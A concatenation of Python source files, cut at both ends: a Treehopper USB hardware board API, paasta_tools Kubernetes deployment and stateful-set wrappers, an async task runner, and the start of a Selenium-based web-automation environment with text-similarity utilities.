Calling this method will connect to the board and start the pin listener update thread. Repeated calls to
this method are ignored.
Warning:
You must connect to the board before performing any operations (other than querying the name() or
serial_number() of the board).
Returns:
None
"""
if self._connected:
return
self._dev.set_configuration()
self._connected = True
self._pin_listener_thread.start()
@property
def pins(self):
"""Gets a list of \link pin.Pin pins\endlink that belong to this board"""
return self._pins
@property
def spi(self):
"""Gets the \link spi.HardwareSpi SPI\endlink peripheral that belongs to this board"""
return self._spi
@property
def i2c(self):
"""Gets the \link i2c.HardwareI2C I2C\endlink peripheral that belongs to this board"""
return self._i2c
@property
def uart(self):
"""Gets the \link uart.HardwareUart UART\endlink peripheral that belongs to this board"""
return self._uart
@property
def pwm1(self):
"""Gets the \link pwm.HardwarePwm PWM1\endlink module that belongs to this board"""
return self._pwm1
@property
def pwm2(self):
"""Gets the \link pwm.HardwarePwm PWM2\endlink module that belongs to this board"""
return self._pwm2
@property
def pwm3(self):
"""Gets the \link pwm.HardwarePwm PWM3\endlink module that belongs to this board"""
return self._pwm3
@property
def led(self) -> bool:
"""
Gets or sets the state of the LED.
Example:
>>> while board.connected:
>>> board.led = not board.led # toggle the LED
>>> sleep(0.1)
Returns:
bool: The current state of the LED.
"""
return self._led
@led.setter
def led(self, val: bool) -> None:
self._led = val
data = [DeviceCommands.LedConfig, self._led]
self._send_peripheral_config_packet(data)
def disconnect(self):
"""Disconnect from the board.
This method disconnects from the board and stops the pin listener update thread. Repeated calls to this
method are ignored."""
if not self._connected:
return
self._connected = False
self._pin_listener_thread.join()
usb.util.dispose_resources(self._dev)
@property
def connected(self):
"""
Gets whether the board is connected.
Returns:
bool: Whether the board is connected
Note:
The board will automatically disconnect if an unrecoverable error is encountered (which includes a
disconnect), so this is a useful property to consult to determine if a board is physically attached to a
computer.
"""
return self._connected
## @}
## @name Board identity & firmware management
# @{
@property
def serial_number(self):
"""
Gets the serial number of the board.
This property is available to read even without connecting to the board. If you wish to change the serial
number,
use update_serial_number().
Note:
While you do not need to connect() to the board before querying its serial number, you will not be able to
retrieve the serial number of a board to which another application is connected.
Treehopper's Python API doesn't currently support directly querying the OS for device info, so while
executing \link find_boards.find_boards() find_boards()\endlink, the API implicitly connects to the board,
queries the string descriptor, and disconnects. Since concurrent operation isn't supported, this operation
will error if the board is already open.
Returns:
str: The serial number.
"""
return self._dev.serial_number
@property
def name(self):
"""
Gets the device name of the board.
This property is available to read even without connecting to the board. If you wish to change the device name,
use update_device_name().
Note:
While you do not need to connect() to the board before querying its device name, you will not be able to
retrieve the device name of a board to which another application is connected.
Treehopper's Python API doesn't currently support directly querying the OS for device info, so while
executing \link find_boards.find_boards() find_boards()\endlink, the API implicitly connects to the board,
queries the string descriptor, and disconnects. Since concurrent operation isn't supported, this operation
will error if the board is already open.
Returns:
str: The device name.
"""
return self._dev.product
def update_serial_number(self, serial_number: str):
"""
Update the serial number on the device.
While the new serial number is immediately available from the serial_number property, the changes will not take
effect in other applications until the device is reset. This can be done by calling reboot().
Args:
serial_number: a 60-character (or fewer) string containing the new serial number (str).
Returns:
None
Examples:
>>> board = find_boards()[0] # Get the first board.
>>> board.connect() # Be sure to connect before doing anything else.
>>> board.update_serial_number("a3bY392") # Change the serial number.
>>> board.reboot() # Reboot the board so the OS picks up the changes.
"""
length = len(serial_number)
if length > 60:
raise RuntimeError("String must be 60 characters or less")
data_to_send = [DeviceCommands.FirmwareUpdateSerial, length] + list(serial_number.encode())
self._send_peripheral_config_packet(data_to_send)
sleep(0.1)
def update_device_name(self, device_name: str):
"""
Update the device name on the device.
While the new device name is immediately available from the name property, the changes will not take
effect in other applications until the device is reset. This can be done by calling reboot().
Note:
Microsoft Windows caches the device name in the registry when it is first attached to the board, so even if
you change the device name with this function, you won't see the new device name --- even after replugging
the board. To force Windows to update the registry with the new name, make sure to change the serial number,
too (see update_serial_number()).
Args:
device_name: a 60-character (or fewer) string containing the new device name (str).
Returns:
None
Examples:
>>> board = find_boards()[0] # Get the first board.
>>> board.connect() # Be sure to connect before doing anything else.
>>> board.update_device_name("Acme Widget") # Update the device name.
>>> board.update_serial_number("a3bY392") # Change the serial number to force Windows refresh.
>>> board.reboot() # Reboot the board so the OS picks up the changes.
"""
length = len(device_name)
if length > 60:
raise RuntimeError("String must be 60 characters or less")
data_to_send = [DeviceCommands.FirmwareUpdateName, length] + list(device_name.encode())
self._send_peripheral_config_packet(data_to_send)
sleep(0.1)
## @}
## @name Other components
# @{
def reboot(self):
"""
Reboots the board.
Calling this method will automatically call the disconnect() method, and no further communication will be
possible until the board is reopened.
Returns:
None
"""
self._send_peripheral_config_packet([DeviceCommands.Reboot])
self.disconnect()
def reboot_into_bootloader(self):
"""
Reboots the board into bootloader mode.
Calling this method will automatically call the disconnect() method, and no further communication will be
possible. You can load new firmware onto the board once in bootloader mode, or if you wish to return to normal
operation, replug the board to reset it.
Returns:
None
"""
self._send_peripheral_config_packet([DeviceCommands.EnterBootloader])
self.disconnect()
def await_pin_update(self):
""" Returns when the board has received a new pin update """
self._pin_update_flag.clear()
self._pin_update_flag.wait()
@property
def hardware_pwm_manager(self):
"""Gets the hardware PWM manager for this board"""
return self._hardware_pwm_manager
## @}
def _pin_listener(self):
while self._connected:
try:
data = self._dev.read(self._pin_report_endpoint, 41, 1000)
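# Pin report layout (inferred from how the bytes are consumed below): byte 0 is
# the report type (0x02 for pin updates), followed by two bytes per pin which
# Pin._update_value() decodes.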
i = 1
if data[0] == 0x02:
for pin in self.pins:
pin._update_value(data[i], data[i + 1])
i += 2
self._pin_update_flag.set()
except usb.USBError as e:
if e.errno == 10060: # timeout win32
pass
elif e.errno == 110: # timeout libusb
pass
elif e.errno == 60: # timeout macos
pass
else:
self._connected = False
return
def _send_pin_config(self, data: List[int]):
try:
self._dev.write(self._pin_config_endpoint, data)
except usb.USBError:
self._connected = False
def _send_peripheral_config_packet(self, data: List[int]):
try:
self._dev.write(self._peripheral_config_endpoint, data)
except usb.USBError:
self._connected = False
def _receive_comms_response_packet(self, num_bytes_to_read: int) -> List[int]:
try:
return self._dev.read(self._peripheral_response_endpoint, num_bytes_to_read)
except usb.USBError:
self._connected = False
return [0] * num_bytes_to_read
|
controller_wrappers.py
|
import logging
import threading
from abc import ABC
from abc import abstractmethod
from time import sleep
from typing import Optional
from typing import Union
from kubernetes.client import V1beta1PodDisruptionBudget
from kubernetes.client import V1DeleteOptions
from kubernetes.client import V1Deployment
from kubernetes.client import V1StatefulSet
from kubernetes.client.rest import ApiException
from paasta_tools.autoscaling.autoscaling_service_lib import autoscaling_is_paused
from paasta_tools.kubernetes_tools import create_deployment
from paasta_tools.kubernetes_tools import create_pod_disruption_budget
from paasta_tools.kubernetes_tools import create_stateful_set
from paasta_tools.kubernetes_tools import force_delete_pods
from paasta_tools.kubernetes_tools import KubeClient
from paasta_tools.kubernetes_tools import KubeDeployment
from paasta_tools.kubernetes_tools import KubernetesDeploymentConfig
from paasta_tools.kubernetes_tools import list_all_deployments
from paasta_tools.kubernetes_tools import load_kubernetes_service_config_no_cache
from paasta_tools.kubernetes_tools import paasta_prefixed
from paasta_tools.kubernetes_tools import pod_disruption_budget_for_service_instance
from paasta_tools.kubernetes_tools import update_deployment
from paasta_tools.kubernetes_tools import update_stateful_set
from paasta_tools.utils import load_system_paasta_config
class Application(ABC):
def __init__(
self,
item: Union[V1Deployment, V1StatefulSet],
logging=logging.getLogger(__name__),
) -> None:
"""
This Application wrapper is an interface for creating/deleting k8s deployments and statefulsets
soa_config is KubernetesDeploymentConfig. It is not loaded in init because it is not always required.
:param item: Kubernetes Object(V1Deployment/V1StatefulSet) that has already been filled up.
:param logging: where logs go
"""
if not item.metadata.namespace:
item.metadata.namespace = "paasta"
attrs = {
attr: item.metadata.labels[paasta_prefixed(attr)]
for attr in ["service", "instance", "git_sha", "config_sha"]
}
self.kube_deployment = KubeDeployment(replicas=item.spec.replicas, **attrs)
self.item = item
self.soa_config = None # type: KubernetesDeploymentConfig
self.logging = logging
def load_local_config(
self, soa_dir: str, cluster: str
) -> Optional[KubernetesDeploymentConfig]:
if not self.soa_config:
self.soa_config = load_kubernetes_service_config_no_cache(
service=self.kube_deployment.service,
instance=self.kube_deployment.instance,
cluster=cluster,
soa_dir=soa_dir,
)
return self.soa_config
def __str__(self):
service = self.kube_deployment.service
instance = self.kube_deployment.instance
git_sha = self.kube_deployment.git_sha
config_sha = self.kube_deployment.config_sha
return f"{service}-{instance}-{git_sha}-{config_sha}"
@abstractmethod
def deep_delete(self, kube_client: KubeClient) -> None:
"""
Remove all controllers, pods, and pod disruption budgets related to this application
:param kube_client:
"""
pass
def create(self, kube_client: KubeClient):
"""
Create all controllers, HPA, and pod disruption budgets related to this application
:param kube_client:
"""
pass
def update(self, kube_client: KubeClient):
"""
Update all controllers, HPA, and pod disruption budgets related to this application
:param kube_client:
"""
pass
def update_related_api_objects(self, kube_client: KubeClient) -> None:
"""
Update related Kubernetes API objects such as HPAs and Pod Disruption Budgets
:param kube_client:
"""
self.ensure_pod_disruption_budget(kube_client)
def delete_pod_disruption_budget(self, kube_client: KubeClient) -> None:
try:
kube_client.policy.delete_namespaced_pod_disruption_budget(
name=self.item.metadata.name,
namespace=self.item.metadata.namespace,
body=V1DeleteOptions(),
)
except ApiException as e:
if e.status == 404:
# Deployment does not exist, nothing to delete but
# we can consider this a success.
self.logging.debug(
"not deleting nonexistent pod disruption budget/{} from namespace/{}".format(
self.item.metadata.name, self.item.metadata.namespace
)
)
else:
raise
else:
self.logging.info(
"deleted pod disruption budget/{} from namespace/{}".format(
self.item.metadata.name, self.item.metadata.namespace
)
)
def ensure_pod_disruption_budget(
self, kube_client: KubeClient
) -> V1beta1PodDisruptionBudget:
max_unavailable: Union[str, int]
if "bounce_margin_factor" in self.soa_config.config_dict:
max_unavailable = (
f"{int((1 - self.soa_config.get_bounce_margin_factor()) * 100)}%"
)
else:
system_paasta_config = load_system_paasta_config()
max_unavailable = system_paasta_config.get_pdb_max_unavailable()
pdr = pod_disruption_budget_for_service_instance(
service=self.kube_deployment.service,
instance=self.kube_deployment.instance,
max_unavailable=max_unavailable,
)
try:
existing_pdr = kube_client.policy.read_namespaced_pod_disruption_budget(
name=pdr.metadata.name, namespace=pdr.metadata.namespace
)
except ApiException as e:
if e.status == 404:
existing_pdr = None
else:
raise
if existing_pdr:
if existing_pdr.spec.min_available is not None:
logging.info(
"Not updating poddisruptionbudget: can't have both "
"min_available and max_unavailable"
)
elif existing_pdr.spec.max_unavailable != pdr.spec.max_unavailable:
logging.info(f"Updating poddisruptionbudget {pdr.metadata.name}")
return kube_client.policy.patch_namespaced_pod_disruption_budget(
name=pdr.metadata.name, namespace=pdr.metadata.namespace, body=pdr
)
else:
logging.info(f"poddisruptionbudget {pdr.metadata.name} up to date")
else:
logging.info(f"creating poddisruptionbudget {pdr.metadata.name}")
return create_pod_disruption_budget(
kube_client=kube_client, pod_disruption_budget=pdr
)
class DeploymentWrapper(Application):
def deep_delete(self, kube_client: KubeClient) -> None:
"""
Remove all controllers, pods, and pod disruption budgets related to this application
:param kube_client:
"""
delete_options = V1DeleteOptions(propagation_policy="Foreground")
try:
kube_client.deployments.delete_namespaced_deployment(
self.item.metadata.name,
self.item.metadata.namespace,
body=delete_options,
)
except ApiException as e:
if e.status == 404:
# Deployment does not exist, nothing to delete but
# we can consider this a success.
self.logging.debug(
"not deleting nonexistent deploy/{} from namespace/{}".format(
self.item.metadata.name, self.item.metadata.namespace
)
)
else:
raise
else:
self.logging.info(
"deleted deploy/{} from namespace/{}".format(
self.item.metadata.name, self.item.metadata.namespace
)
)
self.delete_pod_disruption_budget(kube_client)
self.delete_horizontal_pod_autoscaler(kube_client)
def get_existing_app(self, kube_client: KubeClient):
return kube_client.deployments.read_namespaced_deployment(
name=self.item.metadata.name, namespace=self.item.metadata.namespace
)
def create(self, kube_client: KubeClient) -> None:
create_deployment(kube_client=kube_client, formatted_deployment=self.item)
self.ensure_pod_disruption_budget(kube_client)
self.sync_horizontal_pod_autoscaler(kube_client)
def deep_delete_and_create(self, kube_client: KubeClient) -> None:
self.deep_delete(kube_client)
timer = 0
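# Wait up to 60 seconds for the deleted deployment to disappear from the cluster;
# if it is still listed after that, fall back to force-deleting its pods before
# recreating the deployment.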
while (
self.kube_deployment in set(list_all_deployments(kube_client))
and timer < 60
):
sleep(1)
timer += 1
if timer >= 60 and self.kube_deployment in set(
list_all_deployments(kube_client)
):
try:
force_delete_pods(
self.item.metadata.name,
self.kube_deployment.service,
self.kube_deployment.instance,
self.item.metadata.namespace,
kube_client,
)
except ApiException as e:
if e.status == 404:
# Deployment does not exist, nothing to delete but
# we can consider this a success.
self.logging.debug(
"not deleting nonexistent deploy/{} from namespace/{}".format(
self.kube_deployment.service, self.item.metadata.namespace
)
)
else:
raise
else:
self.logging.info(
"deleted deploy/{} from namespace/{}".format(
self.kube_deployment.service, self.item.metadata.namespace
)
)
self.create(kube_client=kube_client)
def update(self, kube_client: KubeClient) -> None:
# If HPA is enabled, do not update replicas.
# In all other cases, replica is set to max(instances, min_instances)
if self.soa_config.config_dict.get("bounce_method", "") == "brutal":
threading.Thread(
target=self.deep_delete_and_create, args=[KubeClient()]
).start()
return
update_deployment(kube_client=kube_client, formatted_deployment=self.item)
def update_related_api_objects(self, kube_client: KubeClient) -> None:
super().update_related_api_objects(kube_client)
self.sync_horizontal_pod_autoscaler(kube_client)
def sync_horizontal_pod_autoscaler(self, kube_client: KubeClient) -> None:
"""
In order for autoscaling to work, there needs to be at least two configurations
min_instnace, max_instance, and there cannot be instance.
"""
desired_hpa_spec = self.soa_config.get_autoscaling_metric_spec(
name=self.item.metadata.name,
cluster=self.soa_config.cluster,
kube_client=kube_client,
namespace=self.item.metadata.namespace,
)
hpa_exists = self.exists_hpa(kube_client)
should_have_hpa = desired_hpa_spec and not autoscaling_is_paused()
if not should_have_hpa:
self.logging.info(
f"No HPA required for {self.item.metadata.name}/name in {self.item.metadata.namespace}"
)
if hpa_exists:
self.logging.info(
f"Deleting HPA for {self.item.metadata.name}/name in {self.item.metadata.namespace}"
)
self.delete_horizontal_pod_autoscaler(kube_client)
return
self.logging.info(
f"Syncing HPA setting for {self.item.metadata.name}/name in {self.item.metadata.namespace}"
)
self.logging.debug(desired_hpa_spec)
if not hpa_exists:
self.logging.info(
f"Creating new HPA for {self.item.metadata.name}/name in {self.item.metadata.namespace}"
)
kube_client.autoscaling.create_namespaced_horizontal_pod_autoscaler(
namespace=self.item.metadata.namespace,
body=desired_hpa_spec,
pretty=True,
)
else:
self.logging.info(
f"Updating new HPA for {self.item.metadata.name}/name in {self.item.metadata.namespace}/namespace"
)
kube_client.autoscaling.replace_namespaced_horizontal_pod_autoscaler(
name=self.item.metadata.name,
namespace=self.item.metadata.namespace,
body=desired_hpa_spec,
pretty=True,
)
def exists_hpa(self, kube_client: KubeClient) -> bool:
return (
len(
kube_client.autoscaling.list_namespaced_horizontal_pod_autoscaler(
field_selector=f"metadata.name={self.item.metadata.name}",
namespace=self.item.metadata.namespace,
).items
)
> 0
)
def delete_horizontal_pod_autoscaler(self, kube_client: KubeClient) -> None:
try:
kube_client.autoscaling.delete_namespaced_horizontal_pod_autoscaler(
name=self.item.metadata.name,
namespace=self.item.metadata.namespace,
body=V1DeleteOptions(),
)
except ApiException as e:
if e.status == 404:
                # HPA does not exist, nothing to delete but
                # we can consider this a success.
self.logging.debug(
f"not deleting nonexistent HPA/{self.item.metadata.name} from namespace/{self.item.metadata.namespace}"
)
else:
raise
else:
self.logging.info(
"deleted HPA/{} from namespace/{}".format(
self.item.metadata.name, self.item.metadata.namespace
)
)
class StatefulSetWrapper(Application):
def deep_delete(self, kube_client: KubeClient) -> None:
"""
Remove all controllers, pods, and pod disruption budgets related to this application
:param kube_client:
"""
delete_options = V1DeleteOptions(propagation_policy="Foreground")
try:
kube_client.deployments.delete_namespaced_stateful_set(
self.item.metadata.name,
self.item.metadata.namespace,
body=delete_options,
)
except ApiException as e:
if e.status == 404:
# StatefulSet does not exist, nothing to delete but
# we can consider this a success.
self.logging.debug(
"not deleting nonexistent statefulset/{} from namespace/{}".format(
self.item.metadata.name, self.item.metadata.namespace
)
)
else:
raise
else:
self.logging.info(
"deleted statefulset/{} from namespace/{}".format(
self.item.metadata.name, self.item.metadata.namespace
)
)
self.delete_pod_disruption_budget(kube_client)
def create(self, kube_client: KubeClient):
create_stateful_set(kube_client=kube_client, formatted_stateful_set=self.item)
self.ensure_pod_disruption_budget(kube_client)
def update(self, kube_client: KubeClient):
update_stateful_set(kube_client=kube_client, formatted_stateful_set=self.item)
def get_application_wrapper(
formatted_application: Union[V1Deployment, V1StatefulSet]
) -> Application:
app: Application
if isinstance(formatted_application, V1Deployment):
app = DeploymentWrapper(formatted_application)
elif isinstance(formatted_application, V1StatefulSet):
app = StatefulSetWrapper(formatted_application)
else:
raise Exception("Unknown kubernetes object to update")
return app
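# Illustrative usage sketch (not part of the original module): pass a formatted
# V1Deployment or V1StatefulSet and drive the returned wrapper with a KubeClient.
#
#     wrapper = get_application_wrapper(formatted_deployment)  # -> DeploymentWrapper
#     wrapper.create(kube_client)    # creates the deployment plus its PDB and HPA
#     wrapper.update(kube_client)    # or update an existing deployment in place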
|
async_runner.py
|
import logging
import os
import traceback
from collections import namedtuple
from queue import Empty
from threading import Thread
from task_processing.interfaces.runner import Runner
EventHandler = namedtuple('EventHandler', ['predicate', 'cb'])
log = logging.getLogger(__name__)
class AsyncError(Exception):
pass
class Async(Runner):
# TODO: "callbacks" is inconsistent with the EventHandler terminology
# above. This should either be event_handlers, or
# EventHandler should be Callback
def __init__(self, executor, callbacks=None):
if not callbacks:
raise AsyncError("must provide at least one callback")
self.callbacks = callbacks
self.executor = executor
self.TASK_CONFIG_INTERFACE = executor.TASK_CONFIG_INTERFACE
self.stopping = False
self.callback_t = Thread(target=self.callback_loop)
self.callback_t.daemon = True
self.callback_t.start()
def run(self, task_config):
return self.executor.run(task_config)
def kill(self, task_id):
return self.executor.kill(task_id)
def reconcile(self, task_config):
self.executor.reconcile(task_config)
def callback_loop(self):
event_queue = self.executor.get_event_queue()
while True:
if self.stopping:
return
try:
event = event_queue.get(True, 10)
# TODO: have a default callback? raise exception when this
# event is ignored?
if event.kind == 'control' and \
event.message == 'stop':
self.stopping = True
continue
for cb in self.callbacks:
if cb.predicate(event):
try:
cb.cb(event)
except Exception:
log.error(traceback.format_exc())
os._exit(1)
except Empty:
pass
def stop(self):
self.executor.stop()
self.stopping = True
self.callback_t.join()
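# Illustrative usage sketch (not part of the original module); "SomeExecutor" is
# a hypothetical stand-in for any executor exposing run/kill/get_event_queue:
#
#     handlers = [EventHandler(predicate=lambda ev: ev.kind == 'task',
#                              cb=lambda ev: log.info(ev))]
#     runner = Async(SomeExecutor(), callbacks=handlers)
#     task_config = runner.TASK_CONFIG_INTERFACE(...)   # fill in executor-specific fields
#     runner.run(task_config)
#     ...
#     runner.stop()   # stops the executor and joins the callback thread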
|
environment.py
|
# -*- coding: utf-8 -*-
import argparse
import hashlib
import json
import logging
import os
import sys
import platform
import random
import re
import time
import copy
import shutil
import traceback
import difflib
import networkx as nx
import numpy as np
import spacy
import functools
from itertools import takewhile
from io import BytesIO
from zipfile import ZipFile, ZIP_DEFLATED
from datetime import datetime
from dateutil import parser as date_parser
from PIL import Image, ImageTk
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.remote.webelement import WebElement
from selenium.webdriver.support.select import Select
from selenium.common.exceptions import NoSuchElementException
GLOBAL_CONFIGS = {
"semantic_similarity": False,
"action_restriction": False,
"use_annotations": True,
}
REWARD_ITEM_WEIGHTS = {
"step_count": -1,
"action_spatial_distance": -2,
"action_direction": -2,
# "similarity_with_demo_actions": 0,
# "similarity_with_demo_surrounding": 0,
"similarity_with_non_parameters": 5,
"similarity_with_parameters": 10,
# "distance_between_parameters": 0,
"null": 0
}
EXCLUDE_QUERY_WORDS = ["of", "a", "an", "the", "in", "on", "by", "with", "and",
"for", "at", "that", "from", "to", "me", "about"]
SPACY_EXCLUDE = ["first", "second", "third"]
DISTANCE_THRESHOLD = 500
UTG_AS_ZIP = True
COMPRESS_METHOD = ZIP_DEFLATED
COMPRESS_LEVEL = 3
# Hosts that need a longer wait time
LONG_WAIT_HOSTS = [
"academic.microsoft.com",
"ieeexplore.ieee.org",
"online.unitconverterpro.com",
"searchit.libraries.wsu.edu",
"www.rentcafe.com",
"www.rent.com",
"www.joybuy.com",
"www.kohls.com",
"www.bing.com",
"www.google.com",
"estimatefares.com",
"ride.guru",
"www.lyft.com"
]
RESTART_HOSTS = [
"www.expedia.com",
"www.bing.com",
"www.regmovies.com",
"www.fandango.com",
"www.atomtickets.com",
"www.movietickets.com",
"www.moviefone.com",
"www.opentable.com",
"www.uber.com",
"catalog.swanlibraries.net",
"dictionary.cambridge.org",
"www.merriam-webster.com"
]
def lazy_property(func):
attribute = '_lazy_' + func.__name__
@property
@functools.wraps(func)
def wrapper(self):
if not hasattr(self, attribute):
setattr(self, attribute, func(self))
return getattr(self, attribute)
return wrapper
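# Illustrative sketch of lazy_property (not part of the original module): the
# wrapped method runs once per instance and the result is cached on the
# instance under "_lazy_<name>".
#
#     class Page:
#         @lazy_property
#         def title(self):
#             print("computing")   # printed only on the first access
#             return "Home"
#
#     p = Page()
#     p.title   # prints "computing" and returns "Home"
#     p.title   # returns the cached "Home" without recomputing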
class Utils:
_instance = None
def __init__(self):
self.cache = {}
@staticmethod
def _get_instance():
if Utils._instance is None:
Utils._instance = Utils()
return Utils._instance
@lazy_property
def _nlp(self):
nlp = spacy.load("en_core_web_md")
return nlp
@staticmethod
def parse(sentence):
if not sentence:
return sentence
# convert one-way to oneway, g-pound to gpound
sentence = sentence.replace("-", "")
tokens = [token.lemma_ for token in Utils.nlp(sentence.lower(), disable=["tokenizer", "parser", "ner"])]
filtered_tokens = []
for token in tokens:
if len(token) > 1 or Utils.is_number(token):
filtered_tokens.append(token)
return " ".join(filtered_tokens if len(filtered_tokens) > 0 else tokens)
@staticmethod
def md5(text):
m = hashlib.md5(text.encode("utf-8"))
return m.hexdigest()
@staticmethod
def common_prefix(words):
return ''.join(c[0] for c in takewhile(lambda x: all(x[0] == y for y in x), zip(*words)))
@staticmethod
def parse_time_info(text):
time_info = []
try:
date = date_parser.parse(text)
today = datetime.today()
if date.year != today.year:
time_info.append("year:" + str(date.year))
if date.month != today.month:
time_info.append("month:" + str(date.month))
if date.day != today.day:
time_info.append("day:" + str(date.day))
if date.hour != today.hour and date.hour != 0:
time_info.append("hour:" + str(date.hour))
if date.minute != today.minute and date.minute != 0:
time_info.append("minute:" + str(date.minute))
if date.second != today.second and date.second != 0:
time_info.append("second:" + str(date.second))
except Exception:
pass
return time_info
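    # Illustrative sketch (not part of the original module): only the components
    # that differ from today's date (and are non-zero for time fields) are kept,
    # so the output depends on the current date.
    #
    #     # If today were 2020-05-01:
    #     # Utils.parse_time_info("March 3, 2021") -> ["year:2021", "month:3", "day:3"]
    #     # Utils.parse_time_info("May 1")         -> []   (same month and day as today)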
@staticmethod
def date_similarity(query_text, match_text):
method_id = "date_similarity(%s,%s)" % (query_text, match_text)
if method_id not in Utils._get_instance().cache:
query_time_info = Utils.parse_time_info(query_text)
if len(query_time_info) == 0:
return 0
match_time_info = Utils.parse_time_info(match_text)
if len(match_time_info) == 0:
return 0
query_time_info_set = set(query_time_info)
match_time_info_set = set(match_time_info)
if (not query_time_info_set.issuperset(match_time_info_set)) \
and (not query_time_info_set.issubset(match_time_info_set)):
return 0
similarity = difflib.SequenceMatcher(None, query_time_info, match_time_info).ratio()
Utils._get_instance().cache[method_id] = similarity
return similarity
return Utils._get_instance().cache[method_id]
@staticmethod
def words_similarity(query_words, match_words):
query_words = set(query_words)
match_words = set(match_words)
if len(query_words) == 0 or len(match_words) == 0:
return 0
common_score = 0.0
for query_word in query_words:
similarities = [Utils.word_similarity(query_word, match_word) for match_word in match_words]
common_score += max(similarities)
return common_score * 2.0 / (len(query_words) + len(match_words))
@staticmethod
def word_similarity(query_word, match_word, enable_semantic_sim=None):
if enable_semantic_sim is None:
enable_semantic_sim = GLOBAL_CONFIGS['semantic_similarity']
if query_word == match_word:
return 1
query_word = re.sub("[^0-9A-Za-z]", " ", query_word).strip()
match_word = re.sub("[^0-9A-Za-z]", " ", match_word).strip()
if query_word == match_word:
return 1
if len(query_word) == 0 or len(match_word) == 0:
return 0
        # Dirty workaround to fix synonym matching
synonym_lists = [
["weight", "mass"],
["synonym", "thesaurus"],
["find", "search"],
["bedroom", "bed"],
["walk", "foot"],
["publication", "pub"],
["number", "num"],
["destination", "dropoff", "end", "target"],
["source", "start", "pickup"],
["calculate", "compute", "estimate"],
["location", "where", "address"],
["route", "direction"]
]
for synonym_list in synonym_lists:
if query_word in synonym_list and match_word in synonym_list:
return 1
# common_prefix = Utils.common_prefix([query_word, match_word])
# similarity = len(common_prefix) / max(len(query_word), len(match_word))
if Utils.is_number(query_word) and query_word in match_word.split():
return 0.8
if Utils.is_number(match_word) and match_word in query_word.split():
return 0.8
similarity = difflib.SequenceMatcher(None, query_word, match_word).ratio()
if query_word[0] != match_word[0]:
similarity = similarity * 0.5
if enable_semantic_sim:
semantic_similarity = Utils._semantic_similarity(query_word, match_word)
similarity = max(similarity, semantic_similarity)
similarity = similarity if similarity > 0.7 else 0
return similarity
@staticmethod
def _semantic_similarity(query_text, match_text):
semantic_similarity = 0
query_processed = Utils.nlp(query_text)
match_processed = Utils.nlp(match_text)
if query_processed.vector_norm and match_processed.vector_norm:
semantic_similarity = query_processed.similarity(match_processed)
if semantic_similarity < 0:
semantic_similarity = 0
semantic_similarity **= 0.5
return semantic_similarity
@staticmethod
def number_similarity(query_text, match_text):
if Utils.is_number(query_text) and Utils.is_number(match_text):
if abs(float(query_text.replace(",", "")) - float(match_text.replace(",", ""))) < 0.001:
return 1
return 0
@staticmethod
def text_similarity(query_text, match_text):
method_id = "text_similarity(%s,%s)" % (query_text, match_text)
if method_id not in Utils._get_instance().cache:
# try more advanced string similarity metric
if len(query_text) == 0 or len(match_text) == 0:
similarity = 0
elif query_text == match_text:
similarity = 1
elif Utils.is_number(query_text) and Utils.is_number(match_text):
similarity = Utils.number_similarity(query_text, match_text)
elif Utils.is_date(query_text) or Utils.is_date(match_text):
similarity = Utils.date_similarity(query_text, match_text)
else:
if len(query_text) > 3 and len(match_text) > 3:
similarity = Utils.words_similarity(query_text.split(), match_text.split()) ** 0.5
else:
similarity = Utils.word_similarity(query_text, match_text)
# date_similarity = Utils.date_similarity(query_text, match_text)
# similarity = max(similarity, date_similarity)
similarity = similarity if similarity > 0.5 else 0
Utils._get_instance().cache[method_id] = similarity
return similarity
return Utils._get_instance().cache[method_id]
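    # Illustrative sketch of the dispatch above (not part of the original module):
    # numbers use number_similarity, date-like strings use date_similarity, longer
    # strings compare word sets, short strings compare single words, and any score
    # of 0.5 or below is clamped to 0 before being memoized in the instance cache.
    #
    #     # Utils.text_similarity("2,000", "2000.0") -> 1   (treated as equal numbers)
    #     # Utils.text_similarity("", "anything")    -> 0   (empty input short-circuits)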
@staticmethod
def weighted_choice(sample_values, reverse=False):
"""
Choose a sample based on the values.
Samples with higher/lower values get higher chance to be selected.
:param sample_values: a dict mapping samples to values, values should be positive
:param reverse: If set to True, samples with lower values get higher chance to be selected.
:return: a sample
"""
if not sample_values:
return None
samples, values = list(zip(*sample_values.items()))
try:
weights = (1 / (np.array(values) + 0.01)) if reverse else np.array(values)
weight_sum = np.sum(weights)
return np.random.choice(samples) if weight_sum == 0 else np.random.choice(samples, p=weights / weight_sum)
except Exception:
pass
return np.random.choice(samples)
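    # Illustrative sketch (not part of the original module): values become
    # selection weights (their reciprocals when reverse=True) and are normalised
    # into a probability distribution for np.random.choice.
    #
    #     # Utils.weighted_choice({"a": 1, "b": 3})
    #     #   -> "b" about 75% of the time, "a" about 25% of the time
    #     # Utils.weighted_choice({"a": 1, "b": 3}, reverse=True)
    #     #   -> "a" becomes the more likely choice (weights ~ 1 / (value + 0.01))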
@staticmethod
def create_fake_state(current_state, action):
if (not isinstance(current_state, State)) or (not isinstance(action, Action)):
return None
fake_state_dict = copy.deepcopy(current_state.state_dict)
fake_state_screen = current_state.screenshot
fake_state = State(state_dict=fake_state_dict, screenshot=fake_state_screen)
target_ele = fake_state.get_element_by_locator(action.element.locator)
if target_ele is None or not isinstance(target_ele, Element):
return None
if action.action_type not in target_ele.acceptable_action_types:
return None
if action.action_type == Action.INPUT_TEXT:
if target_ele.accepts_text(action.value):
target_ele.ele_dict["value"] = action.value
return fake_state
elif action.action_type == Action.SELECT:
idx_to_select = int(action.value)
try:
options = target_ele.ele_dict["actionSet"]["options"]
option_to_select = options[idx_to_select]
target_ele.ele_dict["actionSet"]["selectedIndices"] = [idx_to_select]
target_ele.ele_dict["text"] = option_to_select
return fake_state
except:
return None
elif action.is_submit:
return fake_state
return None
@staticmethod
def parse_action_to_triple(action_line):
if len(action_line) == 3:
# already a triple
return action_line
m = re.match(ACTION_RE, action_line)
if m:
return m.group(1), m.group(2), m.group(3)
return None
@staticmethod
def parse_actions_to_triples(action_lines):
triples = []
if action_lines is None:
return triples
for action_line in action_lines:
triple = Utils.parse_action_to_triple(action_line)
triples.append(triple)
return triples
@staticmethod
def force_to_str(text):
try:
return str(text)
except:
pass
try:
return str(text.decode("utf-8"))
except:
return text
@staticmethod
def get_host(url):
host_start = url.find("://") + 3
if host_start < 3:
host_start = 0
host_end = url.find("/", host_start)
if host_end == -1:
return url[host_start:]
else:
return url[host_start:host_end]
@staticmethod
def parse_rgb(rgb_str):
m = re.search("(\d+),\s*(\d+),\s*(\d+)", rgb_str)
if m:
